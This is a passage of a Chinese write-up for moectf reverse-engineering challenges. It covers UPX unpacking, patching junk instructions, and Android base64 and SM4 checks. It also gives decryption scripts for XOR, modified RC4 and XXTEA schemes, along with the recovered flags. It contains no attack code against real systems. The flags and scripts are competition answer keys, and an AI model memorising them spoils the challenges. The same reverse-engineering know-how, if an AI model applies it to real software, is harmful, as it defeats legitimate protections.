WinMain 很模板化,实质逻辑都在 sub_140001210</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-39.png" alt="" /></p> <p>分别查看sub_7FF681721420函数与DialogFunc函数,发现前者是空壳,真正的加密逻辑在DialogFunc里</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-40.png" alt="" /></p> <p>输入长度为16</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-41.png" alt="" /></p> <p>对每个字符做异或</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-42.png" alt="" /></p> <p>把异或后的结果 v23 与目标常量比较</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-43.png" alt="" /></p> <p>目标常量为['G','E','O','I','^','L','Q','b','j','\', 0x1E, 'u','L', 0x7F,'D','W']</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-44.png" alt="" /></p> <p>解密</p> <pre><code># 只需改这里:把 .rdata 里目标串的 16 个字节(低 8 位)填进来 target = [ 0x47, 0x45, 0x4F, 0x49, 0x5E, 0x4C, 0x51, 0x62, 0x6A, 0x5C, 0x1E, 0x75, 0x4C, 0x7F, 0x44, 0x57 ] flag = ''.join(chr((b ^ 0x2A) &amp; 0xFF) for b in target) print(flag) # -&gt; moectf{H@v4_fUn} </code></pre> <p>moectf{H@v4_fUn}</p> <h1>07 ezandroid</h1> <p>在AndroidManifest.xml找到android:name <strong>com.example.ezandroid.MainActivity</strong></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-45.png" alt="" /></p> <p>在源代码里按照路径打开<strong>com.example.ezandroid.MainActivity</strong></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-46.png" alt="" /></p> <p>是一个base64编码,字符串为<strong>bW9lY3Rme2FuZHJvaWRfUmV2ZXJzZV9JNV9lYXN5fQ==</strong></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-47.png" alt="" /></p> <p>moectf{android_Reverse_I5_easy}</p> <h1>18 ezandroid.pro</h1> <p>用jdax打开这个apk文件</p> <p>定位到AndroidManifest.xml,在其中找到android:name</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-48.png" alt="" /></p> <p>按照此路径在源代码中打开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-49.png" alt="" /></p> <p>Java 层只做了长度检查(32)和 check(str) 的调用;真正判定逻辑在 native 库 libezandroidpro.so</p> <p>把apk后缀名改为zip</p> <p>在ida中打开libezandroidpro.so</p> <p>定位到Java_com_example_ezandroidpro_MainActivity_check函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-50.png" alt="" /></p> <p>是一个sm4—ECB加密,密钥是moectf2025!!!!!!</p> <p>明文4EEB1EEF2914D79BFA8C5006332097ED2EF06C4A59CAE31C827A08D45CC649C0B971BF2EFBCB160E531A646DF7A6AC0B</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-51.png" alt="" /></p> <p>moectf{SM4_Android_I5_Funing!!!}</p> <h1>05 upx</h1> <p>用die打开有upx加壳</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-52.png" alt="" /></p> <p>用upx脱壳</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-53.png" alt="" /></p> <p>脱壳完成在ida中打开,定位主函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-54.png" alt="" /></p> <p>字符串长度为35</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-55.png" alt="" /></p> <p>加密过程</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-56.png" alt="" /></p> <p>要加密的数据(按顺序)</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-57.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-58.png" alt="" /></p> <p>脚本</p> <pre><code> def reverse_decrypt(encrypted_data): decrypted = [] for i in range(len(encrypted_data)): if i == 0: # 第一个字符已知是 'm' (moectf的开头) first_char = ord('m') decrypted.append(first_char) else: # 使用链式XOR解密公式 prev_encrypted = encrypted_data[i-1] # 前一个加密字节 prev_decrypted = decrypted[i-1] # 前一个解密字节 current_char = prev_encrypted ^ prev_decrypted ^ 0x21 decrypted.append(current_char) return bytes(decrypted) def encrypt_for_verification(plaintext): plaintext_bytes = plaintext.encode('ascii') encrypted = [] for i in range(len(plaintext_bytes) - 1): # 加密公式: encrypted[i] = (plaintext[i] ^ 0x21) ^ plaintext[i+1] enc_byte = (plaintext_bytes[i] ^ 0x21) ^ plaintext_bytes[i+1] encrypted.append(enc_byte) return encrypted def solve_moe_exe(): print("=== moe.exe CTF题目解密算法 ===") print("题目类型: UPX脱壳 + 自定义XOR加密") print() complete_encrypted_data = [ 0x23, 0x2B, 0x27, 0x36, 0x33, 0x3C, 0x03, 0x48, 0x64, 0x0B, 0x1D, 0x76, 0x7B, 0x10, 0x0B, 0x3A, 0x3F, 0x65, 0x76, 0x29, 0x15, 0x37, 0x1C, 0x0A, 0x08, 0x21, 0x3E, 0x3C, 0x3D, 0x16, 0x0B, 0x24, 0x29, 0x24 ] print(f"加密数据长度: {len(complete_encrypted_data)} 字节") print("加密数据 (16进制):") for i in range(0, len(complete_encrypted_data), 16): chunk = complete_encrypted_data[i:i+16] hex_str = ' '.join(f'{b:02X}' for b in chunk) print(f" {hex_str}") print() # 执行解密 print("开始解密...") decrypted_bytes = reverse_decrypt(complete_encrypted_data) # 转换为字符串 try: decrypted_str = decrypted_bytes.decode('ascii') print(f"解密结果: {decrypted_str}") except UnicodeDecodeError: print("解密结果包含非ASCII字符,显示原始字节:") print(decrypted_bytes) return None # 检查并修正flag格式 if decrypted_str.startswith('moectf{') and not decrypted_str.endswith('}'): # 手动添加结尾的'}' final_flag = decrypted_str + '}' print(f"修正后的flag: {final_flag}") else: final_flag = decrypted_str # 验证flag格式 if final_flag.startswith('moectf{') and final_flag.endswith('}'): print("✅ Flag格式正确!") if 'upx' in final_flag.lower(): print("🎯 包含UPX关键词,符合题目背景!") return final_flag else: print("❌ Flag格式不正确") return None def demo_step_by_step(): """ 演示解密过程的每一步 """ print("\n=== 逐步解密演示 ===") # 使用前10字节进行演示 demo_data = [0x23, 0x2B, 0x27, 0x36, 0x33, 0x3C, 0x03, 0x48, 0x64, 0x0B] print("演示数据:", ' '.join(f'{b:02X}' for b in demo_data)) print() decrypted = [] for i in range(len(demo_data)): if i == 0: # 第一个字符 char = ord('m') decrypted.append(char) print(f"步骤 {i+1}: 第一个字符已知 = 'm' (0x{char:02X})") else: # 后续字符的解密 prev_encrypted = demo_data[i-1] prev_decrypted = decrypted[i-1] current_char = prev_encrypted ^ prev_decrypted ^ 0x21 decrypted.append(current_char) char_display = chr(current_char) if 32 &lt;= current_char &lt;= 126 else f'\\x{current_char:02x}' print(f"步骤 {i+1}: {prev_encrypted:02X} ^ {prev_decrypted:02X} ^ 21 = {current_char:02X} ('{char_display}')") # 显示部分结果 partial_result = bytes(decrypted).decode('ascii', errors='ignore') print(f"\n部分解密结果: {partial_result}") def main(): """ 主函数 - 执行完整的解密流程 """ print("moe.exe CTF题目完整解密算法") print("=" * 50) # 1. 执行解密 final_flag = solve_moe_exe() if final_flag: print(f"\n🏆 最终Flag: {final_flag}") # 2. 演示解密步骤 demo_step_by_step() print("\n" + "=" * 50) print("解密完成!") print(f"Flag: {final_flag}") print("题目类型: UPX脱壳 + 自定义XOR加密算法逆向") print("=" * 50) return final_flag else: print("\n❌ 解密失败") return None if __name__ == "__main__": main() </code></pre> <p>moectf{Y0u_c4n_unp4ck_It_vvith_upx}</p> <h1>06 ez3</h1> <p>ida中打开定位到主函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-59.png" alt="" /></p> <p>flag长度为42</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-60.png" alt="" /></p> <p>真正的加密逻辑在check()</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-61.png" alt="" /></p> <p>点开</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-62.png" alt="" /></p> <p>脚本</p> <pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -* MOD = 51966 MUL = 47806 XOR_VAL = 0x114514 LEN = 34 # expected 数组(你给出的值) a = [ 0x0B1B0, 0x5678, 0x7FF2, 0xA332, 0xA0E8, 0x364C, 0x2BD4, 0xC8FE, 0x4A7C, 0x18, 0x2BE4, 0x4144, 0x3BA6, 0xBE8C, 0x8F7E, 0x35F8, 0x61AA, 0x2B4A, 0x6828, 0xB39E, 0xB542, 0x33EC, 0xC7D8, 0x448C, 0x9310, 0x8808, 0xADD4, 0x3CC2, 0x796, 0xC940, 0x4E32, 0x4E2E, 0x924A, 0x5B5C ] def compute_b(ch: int, i: int, prev_b: int|None) -&gt; int: tmp = MUL * (ch + i) if prev_b is not None: tmp ^= (prev_b ^ XOR_VAL) return tmp % MOD # 优先级:'_' 最优,接着 数字,再字母,最后其他可打印字符 def candidate_priority(ch: int): c = chr(ch) if c == '_': return 0 if c.isdigit(): return 1 if c.isalpha(): return 2 if 32 &lt;= ch &lt; 127: return 3 return 4 def gen_candidates(pos: int, prev_b: int|None, byte_range=range(32,127)): t = a[pos] cands = [] for ch in byte_range: if compute_b(ch, pos, prev_b) == t: cands.append(ch) # 按优先级排序(数字优先于字母) cands.sort(key=lambda x: (candidate_priority(x), x)) return cands # DFS 回溯,返回若干候选解(按优先级) def dfs_find(byte_range=range(32,127), max_solutions=20): solutions = [] stack = [(0, None, [])] # pos, prev_b, bytes_list while stack and len(solutions) &lt; max_solutions: pos, prev_b, cur = stack.pop() if pos == LEN: solutions.append(bytes(cur)) continue cands = gen_candidates(pos, prev_b, byte_range) # 逆序压栈,确保优先级高的先弹出 for ch in reversed(cands): new_b = compute_b(ch, pos, prev_b) stack.append((pos + 1, new_b, cur + [ch])) return solutions def main(): print("开始回溯求解(数字优先于字母)...") sols = dfs_find(range(32,127), max_solutions=20) if not sols: print("未在可打印 ASCII 找到解,请尝试全字节范围。") return for i, s in enumerate(sols): try: text = s.decode('ascii') except: text = s.decode('latin1') print(f"[{i}] 候选:{text}") print(" 完整 flag:", "moectf{" + text + "}") print("\n建议第一个候选通常为正确结果:") best = sols[0].decode('ascii', errors='replace') print("最终 flag:", "moectf{" + best + "}") if __name__ == "__main__": main() </code></pre> <p>moectf{Y0u_Kn0w_z3_S0Iv3r_N0w_a1f2bdce4a9}</p> <h1>16 A simple program</h1> <p>ida中打开,定位到main函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-63.png" alt="" /></p> <p>输入到str1中,并与str2对比,相等就输出correct,否则输出wrong,但这个主函数并没有什么校验函数,根据题目提示“falg就在主函数里”,查看字符串</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-64.png" alt="" /></p> <p>上面的moectf是假的flag,下面的数据组就是校验数组,点开这个函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-65.png" alt="" /></p> <p>正如我们所料,对这个数组的数据进行异或,写个脚本</p> <pre><code># decode_flag.py ARR = [ 0x4E, 0x4C, 0x46, 0x40, 0x57, 0x45, 0x58, 0x7A, 0x13, 0x56, 0x7C, 0x73, 0x17, 0x50, 0x50, 0x66, 0x47, 0x02, 0x02, 0x5E ] flag = bytes(b ^ 0x23 for b in ARR).decode('ascii') print(flag) # moectf{Y0u_P4ssEd!!} </code></pre> <p>moectf{Y0u_P4ssEd!!}</p> <h1>08 flower</h1> <p>IDA定位到主函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-66.png" alt="" /></p> <p>点击slove函数,有栈堆不平衡</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-67.png" alt="" /></p> <p>定位到这个位置,发现有花指令,还有函数边界问题</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-68.png" alt="" /></p> <p>先修改花指令</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-69.png" alt="" /></p> <p>之后修改函数边界对着冒红行摁u</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-70.png" alt="" /></p> <p>之后正常反汇编,查看slove函数,找到最主要的一步</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-71.png" alt="" /></p> <p>encode函数以及enc和key,其中正确的初始key很关键</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-72.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-73.png" alt="" /></p> <p>脚本</p> <pre><code># brute_recover_flag.py import string # enc 常量表(32 个) enc = [ 0x4F, 0x1A, 0x59, 0x1F, 0x5B, 0x1D, 0x5D, 0x6F, 0x7B, 0x47, 0x7E, 0x44, 0x6A, 0x07, 0x59, 0x67, 0x0E, 0x52, 0x08, 0x63, 0x5C, 0x1A, 0x52, 0x1F, 0x20, 0x7B, 0x21, 0x77, 0x70, 0x25, 0x74, 0x2B, ] PRINTABLE = set(string.printable) - set("\r\n\t\x0b\x0c") def decode_with_key(enc, key): # s[i] = enc[i] ^ (key + i) bs = [(e ^ ((key + i) &amp; 0xFF)) &amp; 0xFF for i, e in enumerate(enc)] return ''.join(chr(b) for b in bs) def looks_good(s): # 1) 全可打印 2) 不含控制字符 3) 基本可读 return all(ch in PRINTABLE for ch in s) candidates = [] for key in range(256): inner = decode_with_key(enc, key) if looks_good(inner): candidates.append((key, inner)) # 输出候选 key 及解码结果 for key, inner in candidates: print(f"key=0x{key:02X} -&gt; {inner}") # 通常只有极少数候选;从可读性判断最佳那个 </code></pre> <p>moectf{f0r3v3r_JuMp_1n_7h3_a$m_a9b35c3c}</p> <h1>14 upx_revenge</h1> <p>我们只需要在4.24.后面插入UPX!就可以正常脱壳了</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-74.png" alt="" /></p> <p>脱壳</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-75.png" alt="" /></p> <p>IDA打开,分析主函数,最主要的在这</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-76.png" alt="" /></p> <p>去分析sub_7FF6BA531230 sub_7FF6BA531300两个函数</p> <p>sub_7FF6BA531230 是对标准表进行异或14,sub_7FF6BA531300是调用这个表进行Base64编码</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-77.png" alt="" /></p> <p>异或后的表</p> <pre><code>GMLQOJPI^DXHZSBUT[ARCYV-KWEN]@F\\(&gt;JD=MLZSIWPHGYAQBEOU)TNVurqpcjgmlhfnadkbisoetv(zyx,0w.4-2863q1)5?9+7 </code></pre> <p>只需要输入的字符串用这个表进行Base64编码与硬字符串lY7bW=\ck?eyjX7]TZ\}CVbh\tOyTH6&gt;jH7XmFifG]H7对比</p> <p>脚本</p> <pre><code>standard_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" encoded = "lY7bW=\\ck?eyjX7]TZ\\}CVbh\\tOyTH6&gt;jH7XmFifG]H7".replace("\\\\", "\\") # 处理转义 # 生成自定义表 custom_table = ''.join(chr(ord(c) ^ 0xE) for c in standard_table) # 创建映射: char -&gt; index char_to_index = {custom_table[i]: i for i in range(64)} # 解码 flag_bytes = [] for i in range(len(encoded) // 4): group = encoded[i*4:i*4+4] indices = [char_to_index[c] for c in group] value = (indices[0] &lt;&lt; 18) | (indices[1] &lt;&lt; 12) | (indices[2] &lt;&lt; 6) | indices[3] flag_bytes.append(value &gt;&gt; 16 &amp; 0xFF) flag_bytes.append(value &gt;&gt; 8 &amp; 0xFF) flag_bytes.append(value &amp; 0xFF) flag = ''.join(chr(b) for b in flag_bytes) print("Flag:", flag) </code></pre> <p>moectf{Y0u_Re4l1y_G00d_4t_Upx!!!}</p> <h1>15 guess</h1> <p>IDA打开,定位到主函数,无法反编译</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-78.png" alt="" /></p> <p>定位到140001A5A,有花指令</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-79.png" alt="" /></p> <p>改成单条无条件跳转,其余全部nop</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-80.png" alt="" /></p> <p>ok,可以成功反编译</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-81.png" alt="" /></p> <p>分析函数行为,是一个猜谜游戏,主要的逻辑在这里,看名字知道是RC4算法</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-82.png" alt="" /></p> <p>点进去,主要逻辑在rc4_ksa和rc4_prga</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-83.png" alt="" /></p> <p>分别点进去查看,先看ksa,比正常RC4相比密钥要加常数42</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-84.png" alt="" /></p> <p>再看prga是一个标准的</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-85.png" alt="" /></p> <p>接下来我们是找key和enc,shift+F12</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-86.png" alt="" /></p> <p>脚本</p> <pre><code>from binascii import unhexlify def rc4_with_plus42(data: bytes, key: bytes) -&gt; bytes: # === KSA 带 +42 === S = list(range(256)) j = 0 for i in range(256): k = (key[i % len(key)] + 42) &amp; 0xFF j = (j + S[i] + k) &amp; 0xFF S[i], S[j] = S[j], S[i] # === PRGA 标准 === i = j = 0 out = bytearray() for b in data: i = (i + 1) &amp; 0xFF j = (j + S[i]) &amp; 0xFF S[i], S[j] = S[j], S[i] K = S[(S[i] + S[j]) &amp; 0xFF] out.append(b ^ K) return bytes(out) enc_hex = "464DCF81DE6F2E16BE203F10565CCDBFF18CCD6A45967D20DC558FB76C0CC3AE07D154" key_str = "moectf2025" cipher = unhexlify(enc_hex) plain = rc4_with_plus42(cipher, key_str.encode()) print("moectf{" + plain.decode(errors="ignore") + "}") </code></pre> <p>moectf{RrRRccCc44$$_w1th_fl0w3r!!_3c6a11b5}</p> <h1>09 2048_master_re</h1> <p>这道题是一个窗口游戏题,有两种解题思路</p> <p>一种是HOOK,另一种是直接逆向解密</p> <p>先说逆向解密,在字符串中找到这个</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-87.png" alt="" /></p> <p>点开,是一个flag校验函数, 它从 flag.txt 中读取字符串,经过某种加密/变换后,与内置的字节数组 byte_495280 进行比对,若完全一致则返回 0(正确),否则返回 1(错误)。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-88.png" alt="" /></p> <p>去查看加密函数sub_401A81</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-89.png" alt="" /></p> <p>sub_401898:按 小端把明文每 4 字节打包成 uint32_t 数组,长度 Count=(len+3)//4,没有额外写入原始长度;</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-90.png" alt="" /></p> <p>sub_401530:标准 BTEA/XXTEA,delta = 1050114489 (0x3E9779B9),key 为 16 字节,索引 (p^e)&amp;3;</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-91.png" alt="" /></p> <p>sub_40195B:把 uint32_t[] 原样拆回字节(每个 dword → 两个 _WORD),最终输出字节数 <em>a3 = 4</em>Count。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-92.png" alt="" /></p> <p>脚本</p> <pre><code>from typing import List DELTA = 0x3E9779B9 def to_u32_le_blocks(b: bytes) -&gt; List[int]: pad = (-len(b)) % 4 b += b'\x00' * pad return [int.from_bytes(b[i:i+4], 'little') for i in range(0, len(b), 4)] def from_u32_le_blocks(v: List[int]) -&gt; bytes: return b''.join(x.to_bytes(4, 'little') for x in v) def btea(v: List[int], n: int, k: List[int]) -&gt; None: """XXTEA/BTEA inplace; n&gt;1 加密,n&lt;-1 解密""" if n &gt; 1: rounds = 6 + 52 // n _sum = 0 z = v[n - 1] for _ in range(rounds): _sum = (_sum + DELTA) &amp; 0xFFFFFFFF e = (_sum &gt;&gt; 2) &amp; 3 for p in range(n - 1): y = v[p + 1] v[p] = (v[p] + ((((z &gt;&gt; 5) ^ (y &lt;&lt; 2)) + ((y &gt;&gt; 3) ^ (z &lt;&lt; 4))) ^ ((_sum ^ y) + (k[(p ^ e) &amp; 3] ^ z)))) &amp; 0xFFFFFFFF z = v[p] p = n - 1 y = v[0] v[p] = (v[p] + ((((z &gt;&gt; 5) ^ (y &lt;&lt; 2)) + ((y &gt;&gt; 3) ^ (z &lt;&lt; 4))) ^ ((_sum ^ y) + (k[(p ^ e) &amp; 3] ^ z)))) &amp; 0xFFFFFFFF z = v[p] elif n &lt; -1: n = -n rounds = 6 + 52 // n _sum = (rounds * DELTA) &amp; 0xFFFFFFFF y = v[0] while rounds &gt; 0: e = (_sum &gt;&gt; 2) &amp; 3 for p in range(n - 1, 0, -1): z = v[p - 1] v[p] = (v[p] - ((((z &gt;&gt; 5) ^ (y &lt;&lt; 2)) + ((y &gt;&gt; 3) ^ (z &lt;&lt; 4))) ^ ((_sum ^ y) + (k[(p ^ e) &amp; 3] ^ z)))) &amp; 0xFFFFFFFF y = v[p] p = 0 z = v[n - 1] v[0] = (v[0] - ((((z &gt;&gt; 5) ^ (y &lt;&lt; 2)) + ((y &gt;&gt; 3) ^ (z &lt;&lt; 4))) ^ ((_sum ^ y) + (k[(p ^ e) &amp; 3] ^ z)))) &amp; 0xFFFFFFFF y = v[0] _sum = (_sum - DELTA) &amp; 0xFFFFFFFF rounds -= 1 # ==== 数据区 ==== # 全局密文 byte_495280(注意这里只取前 40 字节,其余是 0 padding,不参与校验) cipher_bytes = bytes([ 0x35,0x79,0x77,0xCC,0x1B,0x13,0x41,0x34, 0xF9,0xFF,0x9F,0x91,0xFF,0x5B,0x94,0x78, 0x86,0x2A,0xAF,0xAE,0xD7,0x9E,0x31,0x4D, 0x7A,0xC4,0xA5,0x51,0xD1,0xD9,0x6E,0x44, 0x18,0x52,0x86,0x1B,0x42,0x8A,0xC9,0x63, ]) # key = "2048master2048ma" → 拆成 4 个小端 uint32 key_words = [ int.from_bytes(b"2048", "little"), int.from_bytes(b"mast", "little"), int.from_bytes(b"er20", "little"), int.from_bytes(b"48ma", "little"), ] # ==== 解密流程 ==== v = to_u32_le_blocks(cipher_bytes) btea(v, -len(v), key_words) plain = from_u32_le_blocks(v) # 原始 flag 长度 = 37 flag = plain[:37].decode(errors="ignore") print("Flag:", flag) </code></pre> <p>moectf{@_N1c3_cup_0f_XXL_te4_1n_2O48}</p>